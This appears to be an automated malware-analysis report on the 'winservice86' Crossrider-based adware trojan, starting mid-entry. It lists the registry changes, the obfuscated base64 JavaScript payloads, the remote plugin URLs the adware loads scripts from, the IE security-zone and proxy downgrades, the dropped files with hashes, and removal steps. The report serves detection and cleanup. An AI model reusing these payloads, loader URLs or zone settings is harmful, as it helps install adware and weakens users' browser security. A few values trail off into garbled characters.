Y0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }"

    [HKCU\Software\winservice86\Plugins\44]
    "Version" = "6"

    [HKCU\Software\winservice86\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\winservice86\Plugins\288]
    "Name" = "firstoffer_pricecomp_m"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl3.tmp\extensionData\,"

    [HKCU\Software\winservice86\Plugins\128]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/128.js"

    [HKCU\Software\winservice86\Plugins\91]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/91.js"

    [HKCU\Software\winservice86\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\winservice86\Plugins\43]
    "Version" = "5"

    [HKCU\Software\winservice86\Installer]
    "FullVersionForUrl" = "1_35_09_29"

    [HKCU\Software\winservice86\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "CrAppId" = "64755"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\winservice86\Plugins\253]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\64]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\winservice86\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve "

    [HKCU\Software\winservice86\Plugins\193]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/193.js"

    [HKCU\Software\winservice86\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\winservice86\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "CF AF 19 13 6E D9 43 A2 1F 03 EB 80 2E B4 B6 BE"

    [HKCU\Software\InstalledBrowserExtensions\17638]
    "64755" = "winservice86"

    [HKCU\Software\winservice86\Plugins\269]
    "Version" = "1"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\17638]
    "64755" = "winservice86"

    [HKLM\SOFTWARE\winservice86\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\winservice86\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\winservice86\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"

    [HKCU\Software\winservice86\Plugins\354]
    "Name" = "categories"

    [HKCU\Software\winservice86\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\winservice86\Plugins\17]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\262]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/262.js"

    [HKCU\Software\winservice86\Plugins\37]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/37.js"

    [HKCU\Software\winservice86\Plugins\288]
    "URL" = "http://js.newcloudrack.com/plugins/mins/288.js"

    [HKCU\Software\winservice86\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\winservice86\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;Ç‘"

    [HKCU\Software\winservice86\Plugins\354]
    "URL" = "http://js.newcloudrack.com/plugins/mins/354.js"

    [HKCU\Software\winservice86\Plugins\38]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "UninstallString" = "%Program Files%\winservice86\Uninstall.exe /fcp=1"

    [HKCU\Software\winservice86\Plugins\262]
    "Name" = "pops_5_j_m"

    [HKCU\Software\winservice86\Plugins\37]
    "Version" = "6"

    [HKCU\Software\winservice86\Installer]
    "Params" = "{ source_id : 002201, sub_id : 0, uzid : 0"

    [HKCU\Software\winservice86\Plugins\275]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }"

    [HKCU\Software\winservice86\Plugins\391]
    "Name" = "50intext_new_m"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKCU\Software\winservice86\Plugins\200]
    "URL" = "http://js.newcloudrack.com/plugins/mins/200.js"

    [HKCU\Software\winservice86\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "DisplayVersion" = "1.35.9.29"

    [HKCU\Software\winservice86\Plugins\269]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"

    [HKCU\Software\winservice86\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\winservice86\Plugins\35]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\winservice86\Plugins\289]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZjQyNTQ1MzU0NDgwNDAwMTUwNjMwMTAxODUxNGU0YTRlMWMxNTAyMTU1ODViNWMxNTQ0MTQxMjEzMTMwMDExMTEwMTAyMDMwZjExNGYxNTBhMGY1YjAzMTUxODE4MWEwNDA0NGEwZjFkMWY0NjNjNWMyMzEyNTk1YTAxMWQxNzQ5NTk1YjUyMTIxZjAxNWYyYjJjMzczODIzMjczMjI0MmMyNjMxMjEyYjJmMzQyMDI0MzgyMTI3MzAyYzI3M2YyZTJiMjgzMjNhM2Q1MjEyMTAwZTJmMzY1YzQ3NDMwMzA0MDMwMDAzMTgxODA0NGIzYTNkMzcyMTNiMzkzZjI2MjgzMjIwMzAyYjMyMjQzYTMzM2EyMDNiMjAzZDJiNTE1ODYwNGM1NDQxNTY0NzBhMDAwNzA0MTkzOTA2MGQ1NDVmNDI1NjFiMDAxZTFjMDc1YjU5NGEwMzVhMGIxMjE4MDkxMTEyMTMxNzE0MWQxMDExNDQwZjFiMGM1OTE1MDMwNjA3MWEwZjFlNWIwYzFmMDk1MDIyNDMyMzE5NDM0YjAyMWYwMTVmNDc0NDUyMTkwNTEwNWMyOTNhMjEyNjNjMjczOTNlM2QyNTMzMzczZDMxMmIyMDJmMjIzMDI0MzIzYTMxMjEzMTJiMjMyODJiM2U1MDA0MDYxMDMwMzY1NzVkNTIwMDA2MTUxNjFkMDcxODBmNTEyYjNlMzUzNzJkMjcyMDI2MjMyODMxMzMyOTI0MzIyNDJjM2EyYjIxMzEzZTI5NDc0ZTdlNTM1NDRhNGM1NjExMWExMDA1MWQxZDNkMGU0ZTRlNDE0NDVkNWI3ZTBl', 'vebtstjlta'); }"

    [HKCU\Software\winservice86\Plugins\3]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    "winservice86-bg.exe" = "8000"

    [HKCU\Software\winservice86\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"

    [HKCU\Software\winservice86\Plugins\13]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/13.js"

    [HKCU\Software\winservice86\Plugins\7]
    "Version" = "2"0?0:>0>10?0>

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\winservice86\Plugins\39]
    [HKCU\Software\winservice86\Plugins\38]
    [HKCU\Software\winservice86\Plugins\195]
    [HKCU\Software\winservice86\Plugins\94]
    [HKCU\Software\winservice86\Plugins\193]
    [HKCU\Software\winservice86\Plugins\35]
    [HKCU\Software\winservice86\Plugins\78]
    [HKCU\Software\winservice86\Plugins\37]
    [HKCU\Software\winservice86\Plugins\36]
    [HKCU\Software\winservice86\Plugins\221]
    [HKCU\Software\winservice86\Plugins\220]
    [HKCU\Software\winservice86\Plugins\223]
    [HKCU\Software\winservice86\Plugins\7]
    [HKCU\Software\winservice86\Plugins\242]
    [HKCU\Software\winservice86\Plugins\4]
    [HKCU\Software\winservice86\Plugins\9]
    [HKCU\Software\winservice86\Plugins\102]
    [HKCU\Software\winservice86\Plugins\104]
    [HKCU\Software\winservice86\Plugins\275]
    [HKCU\Software\winservice86\Plugins\93]
    [HKCU\Software\winservice86\Plugins\273]
    [HKCU\Software\winservice86\Plugins\128]
    [HKCU\Software\winservice86\Plugins\17]
    [HKCU\Software\winservice86\Plugins\14]
    [HKCU\Software\winservice86\Plugins\13]
    [HKCU\Software\winservice86\Plugins\64]
    [HKCU\Software\winservice86\Plugins\44]
    [HKCU\Software\winservice86\Plugins\45]
    [HKCU\Software\winservice86\Plugins\46]
    [HKCU\Software\winservice86\Plugins\47]
    [HKCU\Software\winservice86\Plugins\40]
    [HKCU\Software\winservice86\Plugins\41]
    [HKCU\Software\winservice86\Plugins\42]
    [HKCU\Software\winservice86\Plugins\43]
    [HKCU\Software\winservice86\Plugins\230]
    [HKCU\Software\winservice86\Plugins\2]
    [HKCU\Software\winservice86\Plugins\180]
    [HKCU\Software\winservice86\Plugins]
    [HKCU\Software\winservice86\Plugins\184]
    [HKLM\SOFTWARE\Tempo]
    [HKCU\Software\winservice86\Plugins\3]
    [HKCU\Software\winservice86\Plugins\269]
    [HKCU\Software\winservice86\Plugins\246]
    [HKCU\Software\winservice86\Plugins\91]
    [HKCU\Software\winservice86\Plugins\289]
    [HKCU\Software\winservice86\Plugins\263]
    [HKCU\Software\winservice86\Plugins\262]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process 0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000 makes changes in the system registry.


    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "D4 6C 4D 87 58 83 77 EF FB 92 B7 FB BE 3A 32 6B"

    Dropped PE files

    MD5 File path
    03114dadbd9977fc823f95b21fb987e7c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe
    a608387077284a570bb8a063575e3ca3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdate.dll
    8aa4451ed8a9bc44505c6bab7ab92094c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdateres_en.dll
    4f6d8d7cdeb95bc4d4fa946a3195e657c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aafc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psuser.dll
    03114dadbd9977fc823f95b21fb987e7c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe
    a608387077284a570bb8a063575e3ca3c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll
    8aa4451ed8a9bc44505c6bab7ab92094c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll
    4f6d8d7cdeb95bc4d4fa946a3195e657c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aafc:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll
    d858ba2ee718b1db1ced20646e641d08c:\Program Files\globalUpdate\Update\GoogleUpdate.exe
    2c523048ebd358d626fb8bd7b1ad571ac:\Program Files\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe
    5b833b50e9d596b0d3ce325136c0c4fbc:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe
    34b74aa995e73bdd4b9d5060a6855615c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe
    e88ccd8a681b1a12eb53483303dc7692c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe
    6371f0c089ae8fc66b873ec8bb9dc5d2c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe
    ebf09dc278d70dc6d2ab6f0aec4288b1c:\Program Files\winservice86\Interop.IWshRuntimeLibrary.dll
    3a77e9571d9f8748fc5abe0c83f6ec80c:\Program Files\winservice86\Newtonsoft.Json.dll
    740ff202a16e18783b38287c16c8d5d8c:\Program Files\winservice86\SuperSocket.ClientEngine.Common.dll
    ba883ea86ba520ba129a014f280b1c57c:\Program Files\winservice86\SuperSocket.ClientEngine.Core.dll
    de9ace1ad7558a73df25f03c445e779bc:\Program Files\winservice86\SuperSocket.ClientEngine.Protocol.dll
    5c71031021e9b22bd1f2e1696dec7a76c:\Program Files\winservice86\Uninstall.exe
    697c4fdb5abb4e3f19c2c22a5e2ae5a0c:\Program Files\winservice86\WebSocket4Net.dll
    3b22b7f149c6bcdb89c2c9d0305aa4bac:\Program Files\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe
    df7add30d0339c1c12c82d597bf527e8c:\Program Files\winservice86\utils.exe
    2a0e8b0b7075ec87e183337da98ada72c:\Program Files\winservice86\winservice86-bg.exe
    682b4c256af1c16ab3bb4e4ab48adcbec:\Program Files\winservice86\winservice86-bho.dll
    ffc4214f7d095fb806cdb4240ae620f9c:\Program Files\winservice86\winservice86-codedownloader.exe

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

    • Removals

    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.

    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      GoogleUpdate.exe:1300
      GoogleUpdate.exe:1220
      GoogleUpdate.exe:1272
      GoogleUpdate.exe:3944
      GoogleUpdate.exe:476
      GoogleUpdate.exe:2032
      GoogleUpdate.exe:1936
      17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
      f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
      17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
      17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
      winservice86-bg.exe:2952
      winservice86-codedownloader.exe:2888
      winservice86-codedownloader.exe:2796
      regsvr32.exe:2472
      %original file name%.exe:1332
      0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000

    2. Delete the original Trojan file.
    3. Delete or disinfect the following files created/modified by the Trojan:

      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
      %Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
      %Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
      %Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
      %Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
      %Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
      %Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
      %Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
      %Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
